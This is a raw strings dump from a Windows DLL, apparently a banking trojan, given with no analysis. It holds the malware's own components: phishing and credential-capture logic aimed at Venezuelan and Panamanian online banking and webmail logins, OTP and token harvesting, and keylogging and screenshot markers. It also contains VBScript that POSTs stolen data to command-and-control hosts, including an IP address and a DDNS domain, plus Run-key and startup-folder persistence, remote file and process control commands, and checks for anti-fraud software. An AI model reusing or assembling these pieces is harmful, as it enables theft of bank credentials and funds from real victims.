_mjllin.dll

Name: _mjllin.dll
SHA256: 047F19C8E7A07449BB330BF3EC35E158329F127A2E52161063A27ED8ACE5D7D3

NlUiPHBR3XAzabu51vcWqZMghSstk2L87yGYIjTFC69D4OVo0eJnExdmrKpfwQ
start.cfg
configz.zip
open
Uconfini.bat
Uconfini.txt
capivara.exe
close1
https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/pages/index.jsp
[Click]
bckimg\BP\
foto
.jpg
loginP.jsp
loginC.jsp
200.98.145.213
192.168.1.3
is-gmail
gmail
Email
<|>
MSScriptControl.ScriptControl
VBScript
host = "
port = "
cmd="
information="
set httpobj = createobject("msxml2.xmlhttp")
function post (cmd ,param)
on error resume next
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
response = ""
response = post ("is-gmail","")
vai fechar
Off-line
Passwd
usuario:
Senha:
c:\gmail.com.txt
c:\outlookUrl.txt
accounts/Logout
is-outlook
outlook
response = post ("is-outlook","")
offline2
loginfmt
c:\outllok.com.txt
SP=
login.live.com/logout.srf?
offline1
form_BO :
IB.cfg
dd_mm_yyyy
hh_mm_ss
_BO.zip
/HOME/infos/bo/
bckimg\bo\
_BO
.zip
bckimg\ATIVO\
vamo nessa
_ATIVO
teste
/HOME/infos/ATIVO/
temp_bo.cfg
ATIVO
bckimg
\ATIVO
Activo en L
nea
Google Chrome
Chrome_RenderWidgetHostHWND
PagoElectr
nico - Google Chrome
Icon_gc
Icon_gc.ico
-------------------------------------
Browser :
URL :
Data/Hora :
trustee Instalado:
 - Google Chrome
https://activoenlinea.bancoactivo.com/naturales/usuarios/login/J
Activo en L
nea - Google Chrome
Internet Explorer
Icon_ie
Icon_ie.ico
 - Internet Explorer
Activo en L
nea - Internet Explorer
Mozilla Firefox
Icon_ff
Icon_ff.ico
 - Mozilla Firefox
Activo en L
nea - Mozilla Firefox
o conectou :
Erro ao fazer Upload:
EMPRESA
env_bo_emp.zip
.win
FISICA
env_bo_fis.zip
https://www.banesconline.com/mantis/Website/Login.aspx
Banesco Online - Google Chrome
\bo
BanescOnline
{CTRL+V}
Banesco Online
Banesco Online - Internet Explorer
Banesco Online - Mozilla Firefox
foto_TEXTO_
dd-mm-yy-hh
.txt
  Senha:
S.Atual:
N.senha:
conf. N.senha:
foto_infopc.txt
_BOD
bckimg\BOD\
env_BOD_emp.zip
env_BOD_fis.zip
/HOME/infos/BOD/
BOD
\BOD
Banco Occidental de Descuento
ativou
fechou
_EXT
Banca Virtual BODInternet
https://bod.bodmillenium.com
https://bod.bodmillenium.com/e2f/e03/e2fvpini.html
Banca Virtual BODInternet. Banco Occidental de Descuento, Banco Universal, C.A. - Google Chrome
Banesco Panam
env_bp.zip
block_BP.win
c:\img\links.txt
_bp
_BP2.zip
/HOME/infos/bp/
\bp
bloqueado
Banesco Panam
, Sistema de Banca por Internet
pegou
Banesco Panam
, Sistema de Banca por Internet - Google Chrome
Internet Explorer_Server
Banesco Panam
, Sistema de Banca por Internet - Internet Explorer
Banesco Panam
, Sistema de Banca por Internet - Mozilla Firefox
email\ctv\
 [Click<]
 [Click >]
_CTV.zip
/HOME/emails/ctv/
_CTV
\ctv
Correo Web de CANTV
Cantv.net - Te acerca el futuro
internetbanking.cfg
email_TEXTO_
bckimg\EXT\
/HOME/infos/EXT/
EXT
\EXT
INTERNET e24
https://www3.bancoexterior.com/
_.__ INTERNET e24 __.. - Google Chrome
_PEB.zip
/HOME/infos/peb/
bckimg\peb\
_peb
\peb
PagoElectr
nico
https://pagoelectronico.banesco.com/lazaro/Website/login.aspx
PagoElectr
nico - Internet Explorer
PagoElectr
nico - Mozilla Firefox
bckimg\gmail\
env_gmail.zip
block_gmail.win
_gmail
\gmail
Restore
minimizado
MozillaWindowClass
Chrome_WidgetWin_1
http://outlook.com/
https://accounts.google.com/AddSession?
sacu=1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
https://accounts.google.com/AddSession
?sacu=1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
https://accounts.google.com/AddSession?sacu=
1&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&hl=pt-BR&service=mail
bckimg\look\
env_look.zip
block_look.win
_look
\look
Iniciar sesi
Registrarse
Enter
Sign In
Entrar
env_MCTBP.zip
block_MCTBP.win
_MCTBP
_MCTBP2.zip
https://melp.mercantilbankpanama.com/DIBS_MERCANTIL_PANAMA/pages/loginC.jsp
Bienvenidos a Mercantil Bank (Panam
_MULTIB
Multibank
https://multibank.com.pa/
Multibank - Google Chrome
Multibank - Internet Explorer
Multibank - Mozilla Firefox
IEFrame
Frame Tab
TabWindowClass
Shell DocObject View
_Yahoo.zip
/HOME/emails/Yahoo/
email\Yahoo\
_Yahoo
\Yahoo
Iniciar sesi
n en Yahoo
Sign in to Yahoo
Yahoo - Inicio de sesi
https://es.mail.yahoo.com/
.cfg
dd/mm/yyyy
is-ativo
not
response = post ("is-ativo","")
foto_teclado.jpg
NAO
c:\textosdoativo.txt
data[Usuario][nroRif]
data[Usuario][login]
data[Usuario][contrasena]
El correo electr
nico no puede estar en blanco
La Contrase
a no puede estar en blanco
El correo electr
nico no coinciden. Intente otra vez
Lo sentimos, la contrase
a ingresada no es correcta.
====================================
User.......:
pass.......:
Tipo.......:
S.teclado..:
Email......:
S.Email....:
email2.....:
S.Mail_2...:
c:\dados.txt
Por su seguridad, ingrese los datos solicitados y presione "Continuar"
Validacion de Correo Eletr
nico
is-banesco
banesco
response = post ("is-bodinternet","")
https://www.banesconline.com/MANTIS/WEBSITE/administrarclaves/cambiarcoe.aspx
user001
pws001
123456
654321
is-testando
imgVal.y=
/imagenesinhouse/imagenesinhouse.aspx
Su clave de Operaciones Especiales ha sido cambiada satisfactoriamente
SIM
Ud. no posee un producto financiero que le permita realizar esta operaci
Cambio de Clave Operaciones Especiales
c:\img\textos.txt
administrarclaves/cambiarcoe.aspx
/salir.aspx
txtUsuario
txtClave
txtClaveActual
txtNuevaClave
txtConfNuevaClave
is-print
Default.aspx
https://www.banesconline.com/MANTIS/WEBSITE/imagenesinhouse/imagenesinhouse.aspx
/administrarclaves/cambiarcoe.aspx
Login.aspx
is-bodinternet
bodinternet
https://bod.bodmillenium.com/E2F-BIN/E2VCNR01.PGM
CA_USUARI
CA_CONTRA
CA_TIPPER
CA_CUSCUI
/e2f-bin/E2FCONECV1.PGM
cai pra dentro
sendtoken
Lo sentimos, el c
digo OTP ingresado no es correcto.
sendfinalizar
Su Contrase
a Operacional ha sido cambiada satisfactoriamente
sendativartoken
tarjeta
ON-LINE
OF-LINE
Cambio de Contrase
a Operacional
is-panama
panama
response = post ("is-panama","")
<!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 3.2 FINAL/EN">
<HTML>
<SCRIPT Language="Javascript">
function go(url, tg) {
   var frm = document.forms[0];
   frm.ServletName.value = url;
   frm.target = tg;
   frm.submit();
 }
 </SCRIPT>
 <BODY onload= "javascript:go(
https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/
pages/body_wait.jsp?ServletName=https://ebanking.banesco.com.pa/
DIBS_BANESCO_PANAMA/servlet/com.datapro.dibs.servlets.JSBlockCard?
PB=1&OPT=6-8
 body
)">
<form METHOD=POST ACTION="https://ebanking.banesco.com.pa/
DIBS_BANESCO_PANAMA/pages/body_wait.jsp" TARGET="body">
<INPUT TYPE=HIDDEN NAME="ServletName" VALUE="">
<input type=hidden name="ACTIVEOPT" value="">
</form>
</BODY>
</HTML>
UserId
UserPass
  https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/pages/index.jsp
https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/servlet/
com.datapro.dibs.servlets.JSLogOut?UTYPE=2
login_logout.jsp
vc foi desconectado
S.Opera....:
N.Opera....:
N.conf.....:
Vld.CD.....:
Email.......:
senha1.......:
senha2.......:
Tarjeta.......:
TOKEN
La Contrase
a nueva no puede estar en blanco
La Confirmac
on no puede estar en blanco
La Contrase
a y la confirmac
on no son iguales, por favor verifiquelo
La Contrase
a Original y la contrase
a Nueva NO pueden ser iguales, por favor verifiquelo
El C
digo OTP no puede estar en blanco
Lo sentimos, el c
digo A ingresado no es correcto.
----
&OPASSWORD
&NPASSWORD
&CPASSWORD
c:\img\panama.txt
Su Contrase
a Operacional ha sido
cambiada satisfactoriamente
ABERTO
&UserId
&UserPass
DIBS_BANESCO_PANAMA/pages/loginP.jsp
DIBS_BANESCO_PANAMA/pages/menu_ver_top.jsp
DIBS_BANESCO_PANAMA/pages/menu_ver_options.jsp
https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/pages/body_opass_change.jsp
https://ebanking.banesco.com.pa/DIBS_BANESCO_PANAMA/pages/body_alarm_accounts_list.jsp
/pages/body_alarm_accounts_list.jsp
EmailAlertas
pages/body_ccardblock.jsp
DEBCARDNUM
ju-panama
response = post ("ju-panama","")
BPJ
&UserEntity
DIBS_BANESCO_PANAMA/pages/loginC.jsp
is-exterior
exterior
response = post ("is-exterior","")
https://nexo.bancoexterior.com/internetbanking/
temp_EXT.cfg
txtgrupo
txtLogin
txtpassword
Usuarios/intro.asp
WinHttp.WinHttpRequest.5.1
POST
http://
User-Agent
is-ready
El C
digo A no puede estar en blanco
is-multibank
usuario
clave
internet/login2.do
internet/consulta/consolidado.jsp
/lazaro/WebSite/Default.aspx
ctl00_cp_frmAplicacion
input
http://www.google.com.br
GET
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
is-avisos
avisos
set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile("c:\bundadecachorro.txt", True, False)
ts.Write
ts.close
Scripting.Encoder
.vbs
set shellobj = createobject("wscript.shell")
startup = shellobj.specialfolders ("startup") & "\"
pcname = shellobj.expandenvironmentstrings("%computername%") & "_"
username = shellobj.expandenvironmentstrings("%username%")
startup
pcname
username
Set objShell = CreateObject("WScript.Shell")
set filesystemobj = createobject("scripting.filesystemobject")
rundll = "PowerShell Start-Process rundll32.exe " &
 & chr(44) & "dlgProc" & chr(34)
if filesystemobj.fileexists (
) then
objShell.run(rundll),0
End If
.vbe
configs_pc.yxz
True
connex.win
NEWPRINT
MOUSE
novoteclado
PASTE
BACKSPACE
TAB
VK_DOWN
VK_UP
VK_DELETE
VK_SPACE
VK_ESCAPE
<|Drivers|>
<<|Drivers|>>
<|FileManager|>
<<|FileManager|>>
TESTAPASTAS
TESTAFILES
<|DownloadFile|>
<<|
FAZDOWNLOAD
<|UploadFile|>
SUCESSOUPLOAD
ATIVARNAVEGADOR
NAVEGADORCLOSE
<|AbrirFile|>
<|DeleteFile|>
LISTARPROCESS
ABREPROCESS
frm_navprinc
FECHARPROCESS
ESCONDERROCESS
AJUSTARPROCESS
MAXIMIZARPROCESS
EXECUTARPROCESS
DOWNBOFISICA
Wscript.Shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
rundll32.exe "
,dlgProc
REG_SZ
GETPROCESS
PRINT
<|INFO|>
ulogs_0015.cfg
http://bit.ly/1aOYgU7
Trusteer
<|BOFUPLOADFILE|>
ameliadantas123.ddns.net
<|BOUPLOADFILE|>
<|BPUPLOADFILE|>
lybits.cfg
Mensagem da p
gina da web
Progman
.dll
1234
8194
https://bitly.com/1TzKPr6
RapportService.exe
form1 :
Socket Error
www.google.com.br
/internetbanking/pop_valphishing.jsp